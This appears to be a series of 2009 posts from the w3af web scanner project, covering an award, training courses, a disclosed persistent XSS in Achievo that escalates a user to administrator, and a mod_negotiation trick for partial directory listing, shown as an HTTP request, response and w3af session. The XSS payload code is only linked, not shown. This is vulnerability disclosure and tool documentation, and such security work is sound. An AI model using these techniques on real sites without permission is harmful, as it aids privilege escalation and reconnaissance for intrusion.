In the context of the 7th International Congress of Information Security, Andrés Riancho was awarded with the Segurinfo award for his efforts in the development of w3af, and Open Source tool for identifying Web application vulnerabilities. We would like to congratulate him and the rest of the project contributors for this well deserved award!

En el contexto del séptimo Congreso Internacional de Seguridad de la Información, Andrés Riancho recibió el premio Segurinfo 2009 por sus esfuerzos en el desarrollo del software de detección de vulnerabilidades Web Open Source, w3af. Queremos felicitarlo y al resto de los desarrolladores del proyecto por un muy merecido premio.

admin conferences, security, w3af award, buenos aires, premio segurinfo 2009, premio segurinfo 2010, segurinfo, w3af

Bonsai and NopSec have partnered to deliver the second w3af ninja training course in New York City.

The w3af ninja training course is focused on manual and automated discovery and exploitation of web application vulnerabilities using w3af. During this course you’ll also learn how to write your own exploits and customized plugins in order to achieve your goals during a web application penetration test.

This course is an intense hands-on class in which you won’t stop learning for a minute. In each practice we’ll focus on a particular type of web application vulnerability which will be analyzed and understood manually and then it’s detection and exploitation is automated using w3af.

All around the training interesting plugin code snippets will be subject to analysis and modification, which will give you great understanding of the framework and will also give you the means to automate your future web application penetration tests.

Important information

• Date: December 17th / 18th 2009
• Training partners: NopSec, Inc. SOC – 155 Water St., Brooklyn, NY 11201 USA
• More information, and registration is available here.

This is a great opportunity to master the w3af framework, don’t miss it!

andres.riancho bonsai, security, w3af bonsai, nopsec, NYC, training, w3af

Most of us are tired from the usual Cross Site Scripting vulnerabilities that get reported every day in full-disclosure, so when one of our researchers found a XSS in an Open Source project, we hesitated to publish it. After some thinking, we started to realize that maybe it would be interesting to the general public to see a customized XSS payload that would exploit the Web application, which suddenly made our newly discovered XSS vulnerability much more fun.

The vulnerability that we’re going to be exploiting is a persistent cross site scripting in Achievo . For those that do not know, Achievo is a flexible web-based resource management tool for business environments. Achievo’s resource management capabilities will enable organizations to support their business processes in a simple, but effective manner. This vulnerability was found a while ago by our research team, and has been fixed in version 1.4.0.

The vulnerability is a really basic persistent XSS, where we can write virtually anything in the title of a scheduled meeting. As the meetings from a user can be seen by other users, and most interestingly administrators, the XSS can be exploited to elevate privileges in the application.

With the objective of writing the XSS payload, I developed a JavaScript export feature, that allows w3af users to export any HTTP request to JavaScript, that will reproduce the same request when a user loads the script in a browser.

Using the newly created feature, we were able to easily create a JavaScript payload, that when accessed by an Achievo administrator will perform the following tasks:

• Create a new application profile
• Apply administrator privileges to the profile
• Assign the newly created profile to a common user

You can find the customized XSS payload by clicking here. In order to exploit this vulnerability, a user would need to change the first four variables in the script, upload the script to a publicly accessible web server, and then point the Cross Site Scripting to that resource. After some time, and if an Achievo administrator browses through the schedule, the configured user will elevate their privileges to administrator.

In this case it was impossible (because of the application not having that particular feature) to actually upload new files to the web server, but in many other Web applications, it would have been completely possible to create a XSS payload that would use the administrator privileges to upload a specially crafted file to the web server, which would then provide operating system access to the intruder.

With the creation of tools like w3af’s JavaScript export feature, and the huge amount of XSS vulnerabilities found every day, we think that the time for customized XSS payloads written in minutes instead of hours, has arrived!

andres.riancho security, w3af javascript, security, w3af, xss, xss payloads

I’m going to be delivering a Web Application Security training at FRHACK next September 2009! FRHACK is a highly technical, non-business conference that is going to be held at Besançon, France. The training is a two day, hands-on class where the w3af project leader will train you in the techniques and methodologies needed to discover and exploit web application vulnerabilities.

Here is some extra information regarding the training,

Training name: Discovery and exploitation of web application vulnerabilities

Overview

This training course focus is on manual and automated, discovery and exploitation of web application vulnerabilities. During this course you are going to go through a series of lectures followed by hands on practice. In each practice you will find vulnerabilities to exploit, each with a different level of complexity, which will defy your understanding of the subject. After the hands on practice, a small lecture on how the vulnerability is fixed is presented, together with common errors introduced by developers in that process.

The training will also teach you how to use the most advanced tools used by professionals in the field, like w3af (developed by the trainer), the burp suite, sqlmap and many others.

Course Structure

This is a two-day course that combines lectures with increasingly difficult hands-on exercises designed to teach the attendee different ways to discover and exploit web application vulnerabilities. All course materials, and a certificate of completion will be offered. You must provide your own laptop.

Deliverables

- Training booklet with printed slides and trainer comments
- Live CD with Web Application Security Tools
- VMware image with the training environment
- w3af T-Shirt ;)

Audience

Security consultants, system and network administrators, experienced web application developers, information security officers, government agencies.

Topics Covered

• Day One
  1. HTTP protocol review
     • Web architecture
     • HTTP headers and methods
     • HTTP authentication
     • HTTPS
     • Session management: cookies
  2. Common web server misconfigurations
     • Banners
     • Directory Indexing
     • HTTP authentication
     • HTTP method restrictions
  3. Common development and configuration errors
     • HTML comments and versioning
     • File inclusions
     • Backup and local database files
     • Hidden HTML Fields
     • Path Disclosure and directory enumeration
     • Exceptions and error messages
  4. Types of analysis
     • Static code analysis, black box testing and gray box testing:
     • Definitions
     • Vulnerabilities that can be detected
     • Vulnerabilities that CAN’T be detected
  5. Web Application Vulnerabilities
     • Reverse engineering of Java applets y Flash movies
     • Local file read
     • Local file inclusions
     • Path Traversal and Null Bytes
     • Remote file inclusions
     • Cross Site Scripting (XSS)
     • Cross Site Tracing
     • Cross Site Request Forgeries / Session Riding
     • HTTP Response Splitting
• Day Two
  1. Web Application Vulnerabilities
     • Uncommon attack vectors
     • LDAP Injection
     • OS Commanding
     • SQL Injection:
       • Enumeration of tables and columns
       • Execution of queries and stored procedures
       • Creation of files
       • Execution of OS commands
     • Blind SQL Injection
  2. Web application privilege escalation
     • Session handling
     • Logical vulnerabilities
  3. Countermeasures
     • mod_security
     • Hardening for Java
       • HDIV
       • Spring Security
     • PHP hardening:
       • Secure configuration parameters
       • GRASP
       • PHP-IDS

andres.riancho bonsai, conferences france, september, training, w3af, web

A couple of days ago I sent an email to the w3af-users mailing list about a nice little trick that can be used to get a partial directory listing using mod_negotiation’s HTTP content negotiation feature. After half an hour or coding, and some minutes of testing, I had a new discovery plugin for w3af that could exploit this feature.

Before going into detail about this technique I have to say that by no means I have the credit for discovering it, Stefano Di Paola pointed me that he blogged about it in 2007; and I found out about it reading the report of a commercial Web Application Scanner which was handed to me by a client. It seems that this is one of those not-so-known vulnerabilities that resurface from time to time.

The idea about this post is to make this vulnerability widely known and show that there is an automated way of exploiting it with w3af. This can be really helpful when performing the information gathering phase of a Web Application Penetration Test in order to find new resources like backup files (users.zip), old versions of scripts with extensions that won’t be interpreted by Apache (users.php.old), etc.

Enough with the introduction, here is the trick:

GET /backup HTTP/1.0
Accept: foobar/xyz
User-Agent: w3af
Host: 192.168.150.2
Connection: Close

HTTP/1.1 406 Not Acceptable
content-length: 770
vary: negotiate,accept
server: Apache/2.2.8 (Ubuntu)
tcn: list
connection: close
date: Thu, 04 Jun 2009 13:37:35 GMT
content-type: text/html; charset=iso-8859-1
alternates:
   {"backup.php.bak" 1 {type application/x-trash} {length 0}},
   {"backup.php.old" 1 {type application/x-trash} {length 0}},
   {"backup.tgz" 1 {type application/x-gzip} {length 0}},
   {"backup.zip" 1 {type application/zip} {length 0}}

What is basically happening here is that we are sending a specially crafted request to the “/backup” resource, with an invalid “Accept” header. Apache receives this request, which is then forwarded to mod_negotiation. This module lists the contents of the “/” directory, and creates a list with the alternates for the backup resource thats then returned in the alternates header.

The only problem with this technique is that it will only include a file as an alternate if the file has a known extension. Known extensions in Apache are defined (at least in Ubuntu) by /etc/mime.types and by the AddType directives in Apache’s config file. To understand why this is a problem, here is the directory listing for the webroot of the test environment:

dz0@brick:/var/www$ ls backup*
backup.php~  backup.php.bak  backup.php.lala
backup.php.old  backup.tgz  backup.zip

You should notice that the backup.php~ and backup.php.lala weren’t included in the alternates response header.

There is a very detailed post from Matt Tesauro describing this technique, which was written based on his tests performed with mod_negotiation and mod_spelling that is also worth reading.

Exploiting

The objective of this exploit is to gather information about new and unknown resources in a very performant way. When mod_negotiation is disabled, and no directory listing is available, the only way to get a full list of the files inside a directory is by bruteforcing them. Bruteforce attacks can take a lot of time, and are mostly useless if performed blindly.

Using this technique, I created a new discovery plugin called “content_negotiation” that will perform these steps:

1. Identify if mod_negotiation is enabled
2. For every file found by the discovery.webSpider plugin, list alternate resources.
3. For every directory found by the discovery.webSpider plugin, perform a small bruteforce with common file names.

w3af>>> plugins
w3af/plugins>>> discovery content_negotiation, webSpider
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target

http://localhost/w3af/discovery/content_negotiation/backup.php

w3af/config:target>>> back
w3af>>> start
HTTP Content negotiation is enabled in the remote web server.
This could be used to bruteforce file names and find new
resources. This information was found in the request with id 27.
New URL found by webSpider plugin:

http://localhost/w3af/discovery/content_negotiation/

New URL found by content_negotiation plugin:

http://localhost/w3af/discovery/content_negotiation/backup.gz

New URL found by content_negotiation plugin:

http://localhost/w3af/discovery/content_negotiation/backup.tar

New URL found by content_negotiation plugin:

http://localhost/w3af/discovery/content_negotiation/backup.zip

The plugin is publically available in the SVN version of w3af , test it with your web server, and comment on this blog post or in the w3af-users mailing list about your experiences with it. If you have ideas on how to improve the plugin, or different ways of exploiting this mod_negotiation feature I would love to hear about them!

I’m sure that attendees in our Web Application Security Training course will love to play with this new w3af plugin :)

andres.riancho open source, security, w3af content negotiation, exploit, plugin, w3af